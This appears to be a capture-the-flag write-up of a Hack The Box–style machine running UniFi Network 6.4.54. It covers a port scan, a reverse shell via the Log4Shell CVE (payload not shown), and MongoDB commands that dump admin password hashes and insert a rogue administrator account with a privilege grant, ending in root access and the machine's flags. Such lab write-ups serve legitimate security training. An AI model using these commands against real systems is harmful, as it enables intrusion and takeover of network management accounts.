Information Gathering

Scanned all TCP ports:

# save target IP as machine variable
export ip='10.129.54.95'

#initial scan
rustscan -a $ip -- -sVC --open -oN initial
#scan results
PORT     STATE SERVICE         REASON         VERSION
22/tcp   open  ssh             syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
<SNIP>
6789/tcp open  ibm-db2-admin?  syn-ack ttl 63
8080/tcp open  http-proxy      syn-ack ttl 63
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to https://10.129.54.95:8443/manage
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 431
|     Date: Tue, 14 Jan 2025 04:33:00 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 404
|     <SNIP>
|     Location: http://localhost:8080/manage
|     </SNIP>
|_http-open-proxy: Proxy might be redirecting requests
8443/tcp open  ssl/nagios-nsca syn-ack ttl 63 Nagios NSCA
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US/localityName=New York/organizationalUnitName=UniFi
| Subject Alternative Name: DNS:UniFi
| Issuer: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US/localityName=New York/organizationalUnitName=UniFi
<SNIP>
| http-title: UniFi Network
|_Requested resource was /manage/account/login?redirect=%2Fmanage
8843/tcp open  ssl/unknown     syn-ack ttl 63
| fingerprint-strings:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 400
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Tue, 14 Jan 2025 04:33:25 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400
<SNIP>
|_    Request</h1></body></html>
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US/localityName=New York/organizationalUnitName=UniFi
| Subject Alternative Name: DNS:UniFi
| Issuer: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US/localityName=New York/organizationalUnitName=UniFi
<SNIP>
8880/tcp open  cddbp-alt?      syn-ack ttl 63
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 431
|     Date: Tue, 14 Jan 2025 04:33:01 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title<SNIP>

Steps 2 Pwn

• Navigated to port 8443 in chromium

  • discovered a Unifi Network v6.4.54 login page

  • searched for vulnerabilities on Chrome associated with this version of Unifi and found CVE-2021-44228 and this writeup

  • Using the exploit, I landed a reverse shell as the unifi user and grabbed the user flag

  • Upgraded shell in netcat via:

    script /dev/null -c bash
    

  • I then found the mongoDB running on port 27117 via ps aux | grep mongo

  • Then as directed from the writeup, I gathered the below info on users using the following command:

    mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
    

    MongoDB shell version v3.6.3
    connecting to: mongodb://127.0.0.1:27117/ace
    MongoDB server version: 3.6.3
    {
            "_id" : ObjectId("61ce278f46e0fb0012d47ee4"),
            "name" : "administrator",
            "email" : "administrator@unified.htb",
            "x_shadow" : "$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.",
            "time_created" : NumberLong(1640900495),
            "last_site_name" : "default"
    }
    {
            "_id" : ObjectId("61ce4a63fbce5e00116f424f"),
            "email" : "michael@unified.htb",
            "name" : "michael",
            "x_shadow" : "$6$spHwHYVF$mF/VQrMNGSau0IP7LjqQMfF5VjZBph6VUf4clW3SULqBjDNQwW.BlIqsafYbLWmKRhfWTiZLjhSP.D/M1h5yJ0",
            "requires_new_password" : false,
            "time_created" : NumberLong(1640909411),
            "last_site_name" : "default",
            "email_alert_enabled" : false,
            "email_alert_grouping_enabled" : false,
            "email_alert_grouping_delay" : 60,
            "push_alert_enabled" : false
    }
    {
            "_id" : ObjectId("61ce4ce8fbce5e00116f4251"),
            "email" : "seamus@unified.htb",
            "name" : "Seamus",
            "x_shadow" : "$6$NT.hcX..$aFei35dMy7Ddn.O.UFybjrAaRR5UfzzChhIeCs0lp1mmXhVHol6feKv4hj8LaGe0dTiyvq1tmA.j9.kfDP.xC.",
            "requires_new_password" : true,
            "time_created" : NumberLong(1640910056),
            "last_site_name" : "default"
    }
    {
            "_id" : ObjectId("61ce4d27fbce5e00116f4252"),
            "email" : "warren@unified.htb",
            "name" : "warren",
            "x_shadow" : "$6$DDOzp/8g$VXE2i.FgQSRJvTu.8G4jtxhJ8gm22FuCoQbAhhyLFCMcwX95ybr4dCJR/Otas100PZA9fHWgTpWYzth5KcaCZ.",
            "requires_new_password" : true,
            "time_created" : NumberLong(1640910119),
            "last_site_name" : "default"
    }
    {
            "_id" : ObjectId("61ce4d51fbce5e00116f4253"),
            "email" : "james@unfiied.htb",
            "name" : "james",
            "x_shadow" : "$6$ON/tM.23$cp3j11TkOCDVdy/DzOtpEbRC5mqbi1PPUM6N4ao3Bog8rO.ZGqn6Xysm3v0bKtyclltYmYvbXLhNybGyjvAey1",
            "requires_new_password" : false,
            "time_created" : NumberLong(1640910161),
            "last_site_name" : "default"
    }
    

  • Instead of cracking the hash, we will make a shadow admin as directed from the writeup

  • New user command

    mongo --port 27117 ace --eval 'db.admin.insert({"email" : "administrator@unified.htb", "last_site_name" : "default", "name" : "administrator", "time_created" : "NumberLong(1640900495)", "x_shadow" : "$6$/H/eDWRkR4Y62y3y$g/5emeC9bvebAIaYNrZA2cbMT6oSi8cqzYHNE5VLyyJKSxJqGha8A9HPKwg342G2QmTNHu9RiBTb/jgQXuFB41"})'
    

  • New user info

    {
            "_id" : ObjectId("6786d996e7ac6f2f61926513"),
            "email" : "administrator@unified.htb",
            "last_site_name" : "default",
            "name" : "administrator",
            "time_created" : "NumberLong(1640900495)",
            "x_shadow" : "$6$/H/eDWRkR4Y62y3y$g/5emeC9bvebAIaYNrZA2cbMT6oSi8cqzYHNE5VLyyJKSxJqGha8A9HPKwg342G2QmTNHu9RiBTb/jgQXuFB41"
    }
    

  • Sites command

    mongo --port 27117 ace --eval "db.site.find().forEach(printjson);"
    

    • Sites info

    {
            "_id" : ObjectId("61ce269d46e0fb0012d47ec4"),
            "anonymous_id" : "5abcfa17-8e78-4677-8898-d3ffdf9d957c",
            "name" : "super",
            "key" : "super",
            "attr_hidden_id" : "super",
            "attr_hidden" : true,
            "attr_no_delete" : true,
            "attr_no_edit" : true
    }
    {
            "_id" : ObjectId("61ce269d46e0fb0012d47ec5"),
            "anonymous_id" : "27593916-7dfe-4ce8-82de-b11f98c1e814",
            "name" : "default",
            "desc" : "Default",
            "attr_hidden_id" : "default",
            "attr_no_delete" : true
    }
    

  • Command to insert newly created user with “super” site

    mongo --port 27117 ace --eval 'db.privilege.insert({ "admin_id" : "6786d996e7ac6f2f61926513", "permissions" : [ ], "role" : "admin", "site_id" : "61ce269d46e0fb0012d47ec4" });'
    

    NOTE: Make sure to change the value of admin_id and site_id where needed.

• Then, was able to login to the unifi dashboard as an Administrator

• Received ssh creds which happened to be for the root user

• SSH’d as root and retrieved root flag

Trophy

User.txt

6ced1a6a89e666c0620cdb10262ba127

Root.txt

e50bc93c75b634e4b272d2f771c33681